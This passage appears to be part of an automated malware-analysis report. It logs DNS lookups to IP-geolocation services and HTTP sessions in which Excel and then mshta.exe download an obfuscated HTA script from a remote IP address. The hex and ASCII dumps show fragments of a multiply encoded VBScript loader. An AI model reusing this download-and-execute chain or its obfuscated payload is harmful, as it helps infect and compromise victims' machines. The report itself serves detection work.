                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST8.8.8.8192.168.2.220x777dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:06.542923927 CEST8.8.8.8192.168.2.220x539No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:06.542923927 CEST8.8.8.8192.168.2.220x539No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST8.8.8.8192.168.2.220x9649No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST8.8.8.8192.168.2.220x7837No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.833839893 CEST8.8.8.8192.168.2.220xdfa2No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:07.833839893 CEST8.8.8.8192.168.2.220xdfa2No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST8.8.8.8192.168.2.220xc9e2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST8.8.8.8192.168.2.220xb24aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:09.200356960 CEST8.8.8.8192.168.2.220x7a07No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:09.200356960 CEST8.8.8.8192.168.2.220x7a07No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST8.8.8.8192.168.2.220xc01aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST8.8.8.8192.168.2.220xcd74No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:11.348995924 CEST8.8.8.8192.168.2.220x23acNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:11.348995924 CEST8.8.8.8192.168.2.220x23acNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • og1.in
                                                                                  • reallyfreegeoip.org
                                                                                  • 172.245.123.6
                                                                                  • checkip.dyndns.org

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.2249164172.245.123.6803344C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:19.545196056 CEST360OUTGET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: 172.245.123.6
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:20.038341045 CEST1236INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:19 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  ETag: "1ceb0-6234c398c9718"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 118448
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/hta
                                                                                  Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                                                  Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CsCriPT%252520tyPE%25253D%252522tExt/VBscriPt%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                  Sep 30, 2024 10:12:20.038358927 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                  Sep 30, 2024 10:12:20.038366079 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                  Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                  Sep 30, 2024 10:12:20.038372993 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                  Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                  Sep 30, 2024 10:12:20.038378954 CEST896INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                  Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                  Sep 30, 2024 10:12:20.038383961 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                  Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                  Sep 30, 2024 10:12:20.038393974 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509XgQEtG
                                                                                  Sep 30, 2024 10:12:20.038399935 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                  Sep 30, 2024 10:12:20.038405895 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                  Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                  Sep 30, 2024 10:12:20.038413048 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                  Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                  Sep 30, 2024 10:12:20.043508053 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.2249166172.245.123.6803624C:\Windows\System32\mshta.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:22.235387087 CEST437OUTGET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Range: bytes=8896-
                                                                                  Connection: Keep-Alive
                                                                                  Host: 172.245.123.6
                                                                                  If-Range: "1ceb0-6234c398c9718"
                                                                                  Sep 30, 2024 10:12:22.720527887 CEST1236INHTTP/1.1 206 Partial Content
                                                                                  Date: Mon, 30 Sep 2024 08:12:21 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  ETag: "1ceb0-6234c398c9718"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 109552
                                                                                  Content-Range: bytes 8896-118447/118448
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/hta
                                                                                  Data Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 [TRUNCATED]
                                                                                  Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                  Sep 30, 2024 10:12:22.720546007 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                  Sep 30, 2024 10:12:22.720561028 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                  Sep 30, 2024 10:12:22.720572948 CEST672INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                  Sep 30, 2024 10:12:22.720583916 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                  Sep 30, 2024 10:12:22.720593929 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                  Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                  Sep 30, 2024 10:12:22.720604897 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                  Sep 30, 2024 10:12:22.720616102 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                  Sep 30, 2024 10:12:22.720628977 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                  Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509CREaTeObject%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                  Sep 30, 2024 10:12:22.720642090 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
